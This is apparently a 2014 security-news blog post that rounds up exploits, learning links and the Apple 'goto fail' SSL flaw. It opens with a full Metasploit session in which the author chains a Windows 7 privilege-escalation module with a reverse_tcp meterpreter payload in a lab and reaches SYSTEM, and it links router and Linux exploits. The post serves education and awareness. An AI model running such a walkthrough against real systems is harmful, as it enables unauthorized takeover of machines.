Home > Uncategorized > Security News #0x67: goto fail;

Security News #0x67: goto fail;

Exploits
  • I had a chance to try the latest Metasploit Windows privilege escalation exploit- Windows TrackPopupMenuEx Win32k NULL Page. It worked like a charm on my Windows 7 x86 system. Once you have a session from another exploit (say the MS13-055 Internet Explorer vulnerability), proceed as follows.
    msf exploit(ms13_055_canchor) > sessions -l
    
    Active sessions
    ===============
    
      Id  Type                   Information              Connection
      --  ----                   -----------              ----------
      1   meterpreter x86/win32  ANUBIS\zathras @ ANUBIS  10.0.1.9:4444 
    -> 10.0.2.7:49159 (10.0.2.7)
      2   meterpreter x86/win32  ANUBIS\zathras @ ANUBIS  10.0.1.9:4444 
    -> 10.0.2.7:49161 (10.0.2.7)
    
    msf exploit(ms13_055_canchor) > use exploit/windows/local/ms13_081_track
    _popup_menu 
    msf exploit(ms13_081_track_popup_menu) > show options
    
    Module options (exploit/windows/local/ms13_081_track_popup_menu):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION                   yes       The session to run this module on.
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows 7 SP0/SP1
    
    
    msf exploit(ms13_081_track_popup_menu) > set payload windows/meterpreter
    /reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(ms13_081_track_popup_menu) > set lhost 10.0.1.9
    lhost => 10.0.1.9
    msf exploit(ms13_081_track_popup_menu) > set lport 31337
    lport => 31337
    msf exploit(ms13_081_track_popup_menu) > set session 2
    session => 2
    msf exploit(ms13_081_track_popup_menu) > show options
    
    Module options (exploit/windows/local/ms13_081_track_popup_menu):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION  2                yes       The session to run this module on.
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique: seh, thread, process, 
    none
       LHOST     10.0.1.9         yes       The listen address
       LPORT     31337            yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows 7 SP0/SP1
    
    
    msf exploit(ms13_081_track_popup_menu) > exploit
    
    [*] Started reverse handler on 10.0.1.9:31337 
    [*] Launching notepad to host the exploit...
    [+] Process 4088 launched.
    [*] Reflectively injecting the exploit DLL into 4088...
    [*] Injecting exploit into 4088...
    [*] Exploit injected. Injecting payload into 4088...
    [*] Payload injected. Executing exploit...
    [+] Exploit finished, wait for (hopefully privileged) payload execution to 
    complete.
    [*] Sending stage (769024 bytes) to 10.0.2.7
    [*] Meterpreter session 3 opened (10.0.1.9:31337 -> 10.0.2.7:49162) at 
    2014-02-23 14:33:33 -0500
    
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > background 
    [*] Backgrounding session 3...
    msf exploit(ms13_081_track_popup_menu) > sessions -l
    
    Active sessions
    ===============
    
      Id  Type                   Information                   Connection
      --  ----                   -----------                   ----------
      1   meterpreter x86/win32  ANUBIS\zathras @ ANUBIS       10.0.1.9:4444 
    -> 10.0.2.7:49159 (10.0.2.7)
      2   meterpreter x86/win32  ANUBIS\zathras @ ANUBIS       10.0.1.9:4444 
    -> 10.0.2.7:49161 (10.0.2.7)
      3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ANUBIS  10.0.1.9:31337 
    -> 10.0.2.7:49162 (10.0.2.7)
    

    Note that the exploit does not affect 64 bit systems- this is x86 only.

  • I also had a chance to play a bit with last week’s Android Browser and WebView addJavascriptInterface Code Execution module from Metasploit. I tried it against a pair of phones- my current one and a much older one from a few years ago. Neither was vulnerable to the attack. If you go to the discussion for the Metasploit module (and scroll to the end), you will see that someone has set up a page at http://www.droidsec.org/tests/addjsif/ to check if a browser is vulnerable; it reported that both of my test phones were not vulnerable. I will have to go in the lab and see if I can borrow a few others to do some more playing.
  • There is a GitHub project for the saleo Linux privilege escalation attack (CVE 2014-0038) that we mentioned two weeks ago.
  • This isn’t an exploit so much as an improved reconnaissance tool. The folks over at Gotham Digital Science have developed an nmap script that will provide additional information about an HTTP system that uses NTLM authentication. In particular, they get the NetBIOS domain name, NetBIOS computer name, the DNS domain name, the DNS computer name, and the product version. Most cool. You cab get the script directly from nmap if you wish.
  • Exploit-db now has exploit code for a remote code execution vulnerability in a number of Linksys routers. This exploits the same vulnerability that is being used by "TheMoon". You probably want to take a look at the reddit mentioned in the exploit code. The folks at Ars Technica point out that the GUI on these routers cannot be trusted to determine if your system is vulnerable.
  • If you have a meterpreter shell on a remote system, you can now enable a webcam chat session. Seriously.
Learning More
  • Are you looking to learn more about reverse engineering? Are you looking for problems to solve? Have you had a chance to look at Crackmes.de?
  • Students- Daniel Cid on the Sucuri Blog has another post on PHP Backdoors that you definitely want to read!
  • And when my students are done there, your next stop is over at Spider Labs to read about an attack that created a malformed .jpg stuffed with credit card data.
  • Moving away from the web for a moment, there is a nice piece over at the CERT/CC Blog that talks about different memory randomization techniques that can be applied to a Linux kernel.
  • The folks at /DEV/TTYS0 have a nice example of how they were able to change the administrator password on a Linksys WRT120N by exploiting a bug in the fprinf function.
Industry News
  • There is a tremendous flaw in Apple mobile device software; apparently the code meant to validate an SSL connection has been bypassed. Worse, it appears that the same flaw exists in OS X. If you want to know more, you definitely want to check out the reddit, which includes the erroneous source code. The issue apparently is a spurious goto fail statement in some C code. ImperialViolet has a more in-depth analysis of the source code and the problem. The underlying problem is CVE 2014-1266.
  • If you actively study malware, you might want to take a look at Brian Baskin’s experiences using Gmail to share malware samples. Apparently, Google is scanning some password protected .zip files and analyzing them for malware; this was confirmed when the .zip password was "infected".
  • Adobe has released a patch for a circulating zero-day attack against Adobe Flash player.
  • At the same time, Microsoft Internet Explorer 10 is also being attacked in a different campaign; at this point only a Fix-it tool is available.
  • The Cyberwarzone has a timeline of how the SEA attacked Forbes social media accounts.
Advertisements
Categories: Uncategorized
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: